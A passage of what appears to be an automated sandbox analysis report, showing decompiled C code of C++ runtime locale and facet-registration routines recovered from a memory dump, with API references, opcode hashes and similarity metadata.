																												 *(_t638 - 0x10) = _t601;
																												 *(_t638 - 4) = 1;
																												E6E1C6FD3(__eflags, _t601);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
																												 *0x6e286db0 = _t601;
																												goto L54;
																											}
																										} else {
																											_t601 = _t616;
																											goto L54;
																										}
																									}
																								} else {
																									_t600 =  *(_t638 - 0x10);
																									 *(_t638 - 0x10) = _t600;
																									 *(_t638 - 4) = 1;
																									E6E1C6FD3(__eflags, _t600);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
																									 *0x6e286dd8 = _t600;
																									goto L47;
																								}
																							} else {
																								_t600 = _t615;
																								goto L47;
																							}
																						}
																					} else {
																						_t599 =  *(_t638 - 0x10);
																						 *(_t638 - 0x10) = _t599;
																						 *(_t638 - 4) = 1;
																						E6E1C6FD3(__eflags, _t599);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
																						 *0x6e286dc4 = _t599;
																						goto L40;
																					}
																				} else {
																					_t599 = _t614;
																					goto L40;
																				}
																			}
																		} else {
																			_t598 =  *(_t638 - 0x10);
																			 *(_t638 - 0x10) = _t598;
																			 *(_t638 - 4) = 1;
																			E6E1C6FD3(__eflags, _t598);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
																			 *0x6e286dc8 = _t598;
																			goto L33;
																		}
																	} else {
																		_t598 = _t613;
																		goto L33;
																	}
																}
															} else {
																_t597 =  *(_t638 - 0x10);
																 *(_t638 - 0x10) = _t597;
																 *(_t638 - 4) = 1;
																E6E1C6FD3(__eflags, _t597);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
																 *0x6e286df4 = _t597;
																goto L26;
															}
														} else {
															_t597 = _t612;
															goto L26;
														}
													}
												} else {
													_t596 =  *(_t638 - 0x10);
													 *(_t638 - 0x10) = _t596;
													 *(_t638 - 4) = 1;
													E6E1C6FD3(__eflags, _t596);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
													 *0x6e286df8 = _t596;
													goto L19;
												}
											} else {
												_t596 = _t611;
												goto L19;
											}
										}
									} else {
										_t595 =  *(_t638 - 0x10);
										 *(_t638 - 0x10) = _t595;
										 *(_t638 - 4) = 1;
										E6E1C6FD3(__eflags, _t595);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t595 + 4))))();
										 *0x6e286dc0 = _t595;
										goto L12;
									}
								} else {
									_t595 = _t610;
									goto L12;
								}
							}
						} else {
							_t594 =  *(_t638 - 0x10);
							 *(_t638 - 0x10) = _t594;
							 *(_t638 - 4) = 1;
							E6E1C6FD3(__eflags, _t594);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t594 + 4))))();
							 *0x6e286df0 = _t594;
							goto L5;
						}
					} else {
						_t594 = _t609;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF422
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF42C
int.LIBCPMT ref: 6E1CF443

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF4BB

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 97e14a017520839a750956703f9dbe476f218ca44e518a2d33c0541e8c7376ad
Instruction ID: d6025894efc5a81f61734d93bc2f5a242bd8ad8e34df5f4dbca0ff39fa512ffd
Opcode Fuzzy Hash: 97e14a017520839a750956703f9dbe476f218ca44e518a2d33c0541e8c7376ad
Instruction Fuzzy Hash: BB113A759105198BCF05EBD4CC64AFDB37ABF64B14F240408D120E7290CF789989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA24B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1CA24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t94 =  *0x6e286cd0;
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6E1A161C(0x6e286cbc);
				_t71 = _a8;
				_t36 = E6E1A171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t91, _t94, 0x14);
							E6E1C6653( &_v20, 0);
							_t95 =  *0x6e286cd4;
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6E1A161C(0x6e286cc0);
							_t78 = _a8;
							_t92 = E6E1A171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6E1A1438(_t82);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6e22ba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t92);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6e286cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t91);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6e286cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA252
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA25C
int.LIBCPMT ref: 6E1CA273

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CA2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA2EB

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a7c24c8a79117f7aa32393cbabff798c1a9cc7fa9458d991add3004d1c0ac822
Instruction ID: 453eca37adad54a19650af7e00fc2c4972c76643a17334e609ef5088bf3b8699
Opcode Fuzzy Hash: a7c24c8a79117f7aa32393cbabff798c1a9cc7fa9458d991add3004d1c0ac822
Instruction Fuzzy Hash: B911597591052D8BCF02EBE4C854AFEB37ABF64B14F140808E111E7290DF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF2CF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t726 - 0x14, 0);
				_t693 =  *0x6e286dec;
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6E1A161C(0x6e286d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6E1C66BA(_t726 - 0x14);
					return E6E1E0075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6E1D0F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t726 - 0x20);
							E6E1E3D74(_t726 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t676, _t693, 0x14);
							E6E1C6653(_t726 - 0x14, 0);
							_t694 =  *0x6e286dbc;
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6E1A161C(0x6e286d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6E1C66BA(_t726 - 0x14);
								return E6E1E0075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6E1D0FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t726 - 0x20);
										E6E1E3D74(_t726 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t513, _t677, _t694, 0x14);
										E6E1C6653(_t726 - 0x14, 0);
										_t695 =  *0x6e286df0;
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6E1A161C(0x6e286d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6E1C66BA(_t726 - 0x14);
											return E6E1E0075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6E1D1057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t726 - 0x20);
													E6E1E3D74(_t726 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t513, _t678, _t695, 0x14);
													E6E1C6653(_t726 - 0x14, 0);
													_t696 =  *0x6e286dc0;
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6E1A161C(0x6e286d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6E1C66BA(_t726 - 0x14);
														return E6E1E0075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6E1D10BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t726 - 0x20);
																E6E1E3D74(_t726 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t513, _t679, _t696, 0x14);
																E6E1C6653(_t726 - 0x14, 0);
																_t697 =  *0x6e286df8;
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6E1A161C(0x6e286da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6E1C66BA(_t726 - 0x14);
																	return E6E1E0075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6E1D1127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t726 - 0x20);
																			E6E1E3D74(_t726 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t513, _t680, _t697, 0x14);
																			E6E1C6653(_t726 - 0x14, 0);
																			_t698 =  *0x6e286df4;
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6E1A161C(0x6e286da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6E1C66BA(_t726 - 0x14);
																				return E6E1E0075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6E1D11AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t726 - 0x20);
																						E6E1E3D74(_t726 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t513, _t681, _t698, 0x14);
																						E6E1C6653(_t726 - 0x14, 0);
																						_t699 =  *0x6e286dc8;
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6E1A161C(0x6e286d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6E1C66BA(_t726 - 0x14);
																							return E6E1E0075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6E1D1230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t726 - 0x20);
																									E6E1E3D74(_t726 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t513, _t682, _t699, 0x14);
																									E6E1C6653(_t726 - 0x14, 0);
																									_t700 =  *0x6e286dc4;
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6E1A161C(0x6e286d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6E1C66BA(_t726 - 0x14);
																										return E6E1E0075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6E1D12B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t726 - 0x20);
																												E6E1E3D74(_t726 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t513, _t683, _t700, 0x14);
																												E6E1C6653(_t726 - 0x14, 0);
																												_t701 =  *0x6e286dd8;
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6E1A161C(0x6e286d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6E1C66BA(_t726 - 0x14);
																													return E6E1E0075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6E1D1339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t726 - 0x20);
																															E6E1E3D74(_t726 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t513, _t684, _t701, 0x14);
																															E6E1C6653(_t726 - 0x14, 0);
																															_t702 =  *0x6e286db0;
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6E1A161C(0x6e286d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6E1C66BA(_t726 - 0x14);
																																return E6E1E0075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6E1D13A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t726 - 0x20);
																																		E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t513, _t685, _t702, 0x14);
																																		E6E1C6653(_t726 - 0x14, 0);
																																		_t703 =  *0x6e286ddc;
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6E1A161C(0x6e286d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6E1C66BA(_t726 - 0x14);
																																			return E6E1E0075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6E1D1409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t726 - 0x20);
																																					E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t513, _t686, _t703, 0x14);
																																					E6E1C6653(_t726 - 0x14, 0);
																																					_t704 =  *0x6e286de0;
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6E1A161C(0x6e286d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6E1C66BA(_t726 - 0x14);
																																						return E6E1E0075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6E1D1471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t726 - 0x20);
																																								E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t513, _t687, _t704, 0x14);
																																								E6E1C6653(_t726 - 0x14, 0);
																																								_t705 =  *0x6e286dfc;
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6E1A161C(0x6e286da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6E1C66BA(_t726 - 0x14);
																																									return E6E1E0075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6E1D14EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t726 - 0x20);
																																											E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t513, _t688, _t705, 0x14);
																																											E6E1C6653(_t726 - 0x14, 0);
																																											_t706 =  *0x6e286dcc;
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6E1A161C(0x6e286d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6E1C66BA(_t726 - 0x14);
																																												return E6E1E0075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6E1D1558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t726 - 0x20);
																																														E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t513, _t689, _t706, 0x14);
																																														E6E1C6653(_t726 - 0x14, 0);
																																														_t707 =  *0x6e286e00;
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6E1A161C(0x6e286dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6E1C66BA(_t726 - 0x14);
																																															return E6E1E0075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6E1D15C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t726 - 0x20);
																																																	E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t513, _t690, _t707, 0x14);
																																																	E6E1C6653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6e286dd0;
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6E1A161C(0x6e286d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t726 - 0x14);
																																																		return E6E1E0075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6E1D162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6E1A1438(_t625);
																																																				E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e22851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6e22c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6E1D542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6E1E0075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t691);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6e286dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t690);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6e286e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t689);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6e286dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t688);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6e286dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t687);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6e286de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t686);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6e286ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t685);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6e286db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6E1C6FD3(__eflags, _t684);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
